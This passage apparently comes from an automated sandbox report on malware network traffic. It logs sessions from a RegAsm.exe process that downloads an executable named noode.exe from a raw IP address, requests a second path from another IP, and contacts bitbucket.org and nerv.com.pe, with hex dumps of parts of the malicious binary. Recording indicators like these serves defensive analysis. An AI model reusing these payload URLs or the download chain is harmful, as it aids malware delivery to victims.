Sep 21, 2024 14:48:09.022038937 CEST	1236	IN	Data Raw: 00 00 00 90 81 c4 8c 00 00 00 5b 5e 5f 5d c3 55 89 e5 83 ec 28 c7 45 ec 10 1f 40 00 c7 45 f0 33 1f 40 00 c7 45 f4 00 00 00 00 8b 45 f4 8b 44 85 ec eb 21 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 12 8f 41 00 c7 45 f4 01 00 00 00 8b 45 f4 8b 44 85 Data Ascii: [^_]U(E@E3@EED!ED$E$AEEDUE@]UE@]UVS E@0E@E@E@Et$\$L$T$$]@E@ [^]U(E}t}uE$
Sep 21, 2024 14:48:09.022149086 CEST	1236	IN	Data Raw: 28 8b 00 89 45 98 8b 45 08 8b 40 24 8b 08 89 4d 94 8b 45 08 8b 40 20 8b 18 89 5d 90 8b 45 08 8b 40 1c 8b 30 89 75 8c 8b 45 08 8b 40 18 8b 38 89 7d 88 8b 45 08 8b 40 14 8b 38 8b 45 08 8b 40 10 8b 30 8b 45 08 8b 40 0c 8b 18 8b 45 08 8b 40 08 8b 08 Data Ascii: (EE@$ME@ ]E@0uE@8}E@8E@0E@E@E@EET$xUT$tUT$pUT$lUT$hUT$dUT$`UT$\UT$XUT$TUT$PUT$LUT$HUT$DUT$@UT$<UT$8UT$4UT$0UT$,UT$
Sep 21, 2024 14:48:09.022161007 CEST	1236	IN	Data Raw: 89 4c 24 18 dd 5c 24 10 8b 75 8c 89 74 24 0c dd 5c 24 04 89 04 24 e8 19 07 34 00 c7 45 e4 02 00 00 00 e9 fc 03 00 00 8b 45 18 8b 00 8b 90 5c af 01 00 83 c2 01 89 90 5c af 01 00 c7 45 e4 11 00 00 00 e9 dc 03 00 00 8b 45 18 8b 00 8b 90 50 af 01 00 Data Ascii: L$\$ut$\$$4EE\\EEPEXEE@E$ET]E0uEX}E4MEE]E40uE(8}E,E<ME(EEX]E0uE
Sep 21, 2024 14:48:09.022171974 CEST	1236	IN	Data Raw: 8b 92 90 00 00 00 8b 1a 89 04 24 ff d1 89 03 8b 45 08 c7 80 ac 00 00 00 00 00 00 00 90 8b 5d fc c9 c3 55 89 e5 8b 45 08 c7 40 58 02 00 00 00 90 5d c3 55 89 e5 83 ec 28 c7 45 ec af 2d 40 00 c7 45 f0 b3 2d 40 00 c7 45 f4 01 00 00 00 8b 45 f4 8b 44 Data Ascii: $E]UE@X]U(E-@E-@EED2ED$ED$ED$E$TuFEEDU Ef.@E.@EL.@E2.@EEDE@XqEEDE@bqEED
Sep 21, 2024 14:48:09.022701979 CEST	1236	IN	Data Raw: 00 dd 45 88 dd 5c 24 78 d9 cd 8b 45 84 89 44 24 74 8b 45 80 89 44 24 70 8b 85 7c ff ff ff 89 44 24 6c 8b 85 78 ff ff ff 89 44 24 68 dd 5c 24 60 d9 cb 8b 85 74 ff ff ff 89 44 24 5c 8b 85 68 ff ff ff 89 44 24 58 8b 85 70 ff ff ff 89 44 24 54 8b 85 Data Ascii: E\$xED$tED$p\|D$lxD$h\$`tD$\hD$XpD$TdD$PXD$L\$D`D$@\$8TD$4PD$0LD$,\|$(\$ \$\$T$\$$.C0u8}
Sep 21, 2024 14:48:09.022722006 CEST	1236	IN	Data Raw: 70 ff ff ff 89 44 24 54 8b 85 64 ff ff ff 89 44 24 50 8b 85 58 ff ff ff 89 44 24 4c 8b 85 60 ff ff ff 89 44 24 48 dd 5c 24 40 8b 85 54 ff ff ff 89 44 24 3c 8b 85 50 ff ff ff 89 44 24 38 8b 85 4c ff ff ff 89 44 24 34 8b 85 48 ff ff ff 89 44 24 30 Data Ascii: pD$TdD$PXD$L`D$H\$@TD$<PD$8LD$4HD$0DD$,D$(@D$$D$ <D$\|$t$\$L$\$$:8,E0E8E$EExEpME@UEE\EELME

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49713	176.113.115.33	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.261471987 CEST	207	OUT	HEAD /thebig/noode.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 176.113.115.33 Cache-Control: no-cache
Sep 21, 2024 14:48:09.084336996 CEST	377	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Sat, 21 Sep 2024 12:48:08 GMT Content-Type: application/octet-stream Content-Length: 3143204 Connection: keep-alive X-Powered-By: PHP/7.4.33 Content-Description: File Transfer Content-Disposition: attachment; filename=noode.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public
Sep 21, 2024 14:48:09.085005045 CEST	206	OUT	GET /thebig/noode.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 176.113.115.33 Cache-Control: no-cache
Sep 21, 2024 14:48:09.443238020 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Sat, 21 Sep 2024 12:48:09 GMT Content-Type: application/octet-stream Content-Length: 3143204 Connection: keep-alive X-Powered-By: PHP/7.4.33 Content-Description: File Transfer Content-Disposition: attachment; filename=noode.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@P,CODE0 `DATAP@BSS.idataP@.tls.rdata@P.reloc@P.rsrc,,@P@
Sep 21, 2024 14:48:09.443284988 CEST	224	IN	Data Raw: 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Pstring<@m@)@(@(@)@
Sep 21, 2024 14:48:09.443317890 CEST	1236	IN	Data Raw: 00 11 00 0b 00 24 29 40 00 04 46 72 65 65 13 00 30 29 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 16 00 4c 29 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 10 00 68 28 40 00 09 43 6c 61 73 73 54 79 70 65 10 00 6c 28 40 00 09 43 6c 61 73 Data Ascii: $)@Free0)@InitInstanceL)@CleanupInstanceh(@ClassTypel(@ClassName(@ClassNameIs(@ClassParent)@ClassInfo(@InstanceSize)@InheritsFrom)@Dispatch)@MethodAddress<@MethodNamex@FieldAd
Sep 21, 2024 14:48:09.443422079 CEST	1236	IN	Data Raw: 55 83 c4 ec 89 4c 24 04 89 14 24 c7 44 24 08 ff ff ff ff 33 d2 89 54 24 0c 8b e8 8b 04 24 03 c5 89 44 24 10 8b 1d 3c c4 40 00 eb 51 8b 3b 8b 73 08 3b ee 77 46 8b c6 03 43 0c 3b 44 24 10 77 3b 3b 74 24 08 73 04 89 74 24 08 8b c6 03 43 0c 3b 44 24 Data Ascii: UL$$D$3T$$D$<@Q;s;wFC;D$w;;t$st$C;D$vD$hjVu@<@uD$3\|$tD$T$D$+D$T$B]_^[SVWUL$$$T$D$(D$+T$B
Sep 21, 2024 14:48:09.443433046 CEST	1236	IN	Data Raw: c4 40 00 00 0f 84 ce 00 00 00 33 d2 55 68 b4 1a 40 00 64 ff 32 64 89 22 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 66 f8 ff ff c6 05 15 c4 40 00 00 a1 74 c4 40 00 50 e8 34 f8 ff ff 33 c0 a3 74 c4 40 00 8b 1d 3c c4 40 00 eb 12 68 00 80 00 00 6a Data Ascii: @3Uh@d2d"=2@th@f@t@P43t@<@hjCP%<@u<@L@x@u4@t4@P4@udh@=2@th@h@C[]S;h@uPh@P
Sep 21, 2024 14:48:09.443444014 CEST	1236	IN	Data Raw: 00 33 d2 c1 e8 02 3d 00 04 00 00 77 16 8b 15 74 c4 40 00 8b 54 82 f4 85 d2 75 08 40 3d 01 04 00 00 75 ea 8b c2 c3 8d 40 00 53 56 57 55 8b f0 bf 68 c4 40 00 bd 6c c4 40 00 8b 1d 60 c4 40 00 3b 73 08 0f 8e 84 00 00 00 8b 1f 8b 43 08 3b f0 7e 7b 89 Data Ascii: 3=wt@Tu@=u@SVWUh@l@`@;sC;~{s[;sB;tcuNu3;u)u}}u3Ep@5p@@5@L6S+\|`;uC
Sep 21, 2024 14:48:09.443553925 CEST	896	IN	Data Raw: e8 30 f7 ff ff 83 3c 24 0c 7c 1b 8b dd 03 de 8b 04 24 83 c8 02 89 03 8b c3 83 c0 04 e8 c8 f7 ff ff e9 fe 00 00 00 8b f7 e9 f7 00 00 00 8b c6 2b c7 89 44 24 04 3b 1d 70 c4 40 00 75 67 a1 6c c4 40 00 3b 44 24 04 7c 53 8b 44 24 04 29 05 6c c4 40 00 Data Ascii: 0<$\|$+D$;p@ugl@;D$\|SD$)l@D$p@=l@}l@p@5l@3l@+@E%uUuMH$$;L$s$$)D$,fD$)$<$\|$:4$#
Sep 21, 2024 14:48:09.443564892 CEST	892	IN	Data Raw: 90 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 Data Ascii: SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_i,@B,@SVWPtQ11F t-tE+tB$tBt20w*9w&Fu
Sep 21, 2024 14:48:09.443577051 CEST	1236	IN	Data Raw: 85 f6 74 14 66 8b 3e 83 c6 06 8a 4e 06 38 d9 74 18 8d 74 0e 07 4f 75 f2 8b 40 ec 85 c0 75 de 5a eb 1b 8a 1a 8a 4e 06 eb e8 8a 5c 0e 06 32 1c 0a 80 e3 df 75 ed 49 75 f1 8b 06 5a 01 d0 5f 5e 5b c3 52 51 53 ff 50 f4 31 d2 8d 4c 24 10 64 8b 1a 89 19 Data Ascii: tf>N8ttOu@uZN\2uIuZ_^[RQSP1L$diA*@Ad[YZD$,@&R=@vjjjh=@tPPRTjjhyXTjjheX=@vPs=@vP
Sep 21, 2024 14:48:09.443587065 CEST	224	IN	Data Raw: 44 24 04 83 c1 05 64 89 02 ff d1 c2 0c 00 c3 8b c0 89 14 24 e9 cd 0e 00 00 c3 8d 40 00 55 8b ec 8b 55 08 8b 02 3d 92 00 00 c0 7f 2c 74 5c 3d 8e 00 00 c0 7f 15 74 57 2d 05 00 00 c0 74 5c 2d 87 00 00 00 74 3d 48 74 4e eb 60 05 71 ff ff 3f 83 e8 02 Data Ascii: D$d$@UU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%RX]D$@uk2T$jPh<0@R
Sep 21, 2024 14:48:09.443661928 CEST	1236	IN	Data Raw: ff 8b 5c 24 04 81 3b ce fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 0c c0 40 00 85 d2 0f 84 1c ff ff ff 89 d8 ff d2 85 c0 0f 84 10 ff ff ff 8b 53 0c e8 78 fb ff ff 8b 0d 00 c0 40 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 b1 Data Ascii: \$;SCt@Sx@tL$Q$11Edd@0@h@1@d9udt9u@j@@@4.@@S=@}!hj@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49714	185.166.143.48	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.266283989 CEST	171	OUT	Data Raw: 16 03 03 00 a6 01 00 00 a2 03 03 66 ee c0 87 8d c6 17 46 0e ad 95 85 f8 75 f2 7a 42 3f 3e 21 e5 8c ae b8 bc 1f 68 2f e4 c1 61 c2 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: fFuzB?>!h/a&,+0/$#('=<5/Sbitbucket.org#
Sep 21, 2024 14:48:08.891916037 CEST	156	IN	HTTP/1.1 400 Bad Request content-length: 11 content-type: text/plain date: Sat, 21 Sep 2024 12:48:08 GMT server: envoy connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49716	162.241.61.218	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.483576059 CEST	169	OUT	Data Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee c0 87 52 2b 01 42 a9 4a 08 b2 07 57 a2 22 b0 a9 22 09 25 34 ed 9f 15 80 25 84 e7 db 83 bc 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: fR+BJW""%4%&,+0/$#('=<5/Qnerv.com.pe#
Sep 21, 2024 14:48:08.967529058 CEST	513	IN	HTTP/1.1 400 Bad Request Date: Sat, 21 Sep 2024 12:48:08 GMT Server: Apache Content-Length: 347 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49715	162.241.61.218	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.483577013 CEST	169	OUT	Data Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee c0 87 19 81 8f 9f 05 e4 9f ac 74 4e 4e 73 48 46 a3 e8 76 7c 26 26 b3 79 d2 48 c1 fc 4f 5c 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: ftNNsHFv\|&&yHO\&,+0/$#('=<5/Qnerv.com.pe#
Sep 21, 2024 14:48:08.963943958 CEST	513	IN	HTTP/1.1 400 Bad Request Date: Sat, 21 Sep 2024 12:48:08 GMT Server: Apache Content-Length: 347 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49717	185.166.143.48	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.899231911 CEST	117	OUT	Data Raw: 16 03 01 00 70 01 00 00 6c 03 01 66 ee c0 87 df 90 74 c7 f0 1b 36 1d 3b 07 63 34 b6 4e fd c6 23 25 fb 11 73 96 5a 65 8e 3f f4 d2 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 35 00 00 00 12 00 10 00 00 0d 62 69 74 62 75 63 6b 65 74 Data Ascii: plft6;c4N#%sZe?5/5bitbucket.org#
Sep 21, 2024 14:48:09.537723064 CEST	156	IN	HTTP/1.1 400 Bad Request content-length: 11 content-type: text/plain date: Sat, 21 Sep 2024 12:48:09 GMT server: envoy connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49718	176.111.174.109	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.947329998 CEST	196	OUT	GET /kurwa HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 176.111.174.109 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49719	162.241.61.218	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.970448017 CEST	169	OUT	Data Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee c0 87 73 8f 2b bb 82 bb 46 2e 70 55 7a e3 ca af 90 e6 8c 54 d9 61 29 98 21 64 31 79 c7 7d 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: fs+F.pUzTa)!d1y}&,+0/$#('=<5/Qnerv.com.pe#
Sep 21, 2024 14:48:09.460949898 CEST	513	IN	HTTP/1.1 400 Bad Request Date: Sat, 21 Sep 2024 12:48:09 GMT Server: Apache Content-Length: 347 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49720	162.241.61.218	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:08.973561049 CEST	115	OUT	Data Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee c0 87 9d 93 4f 2b 65 1e 98 1c 03 5a de 32 ec 9e 36 09 01 a4 79 9c f4 48 e4 02 cc 91 d4 0d 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e Data Ascii: njfO+eZ26yH5/3nerv.com.pe#
Sep 21, 2024 14:48:09.455365896 CEST	513	IN	HTTP/1.1 400 Bad Request Date: Sat, 21 Sep 2024 12:48:09 GMT Server: Apache Content-Length: 347 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49721	162.241.61.218	80	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 14:48:09.461575985 CEST	115	OUT	Data Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee c0 88 a1 d2 94 a9 1a 02 8a 3f e9 c5 c0 0f 04 6e 88 1e df 7c 0d f4 f8 7c 15 b6 0c 79 d2 ba 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e Data Ascii: njf?n\|\|y5/3nerv.com.pe#
Sep 21, 2024 14:48:09.977042913 CEST	513	IN	HTTP/1.1 400 Bad Request Date: Sat, 21 Sep 2024 12:48:09 GMT Server: Apache Content-Length: 347 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC 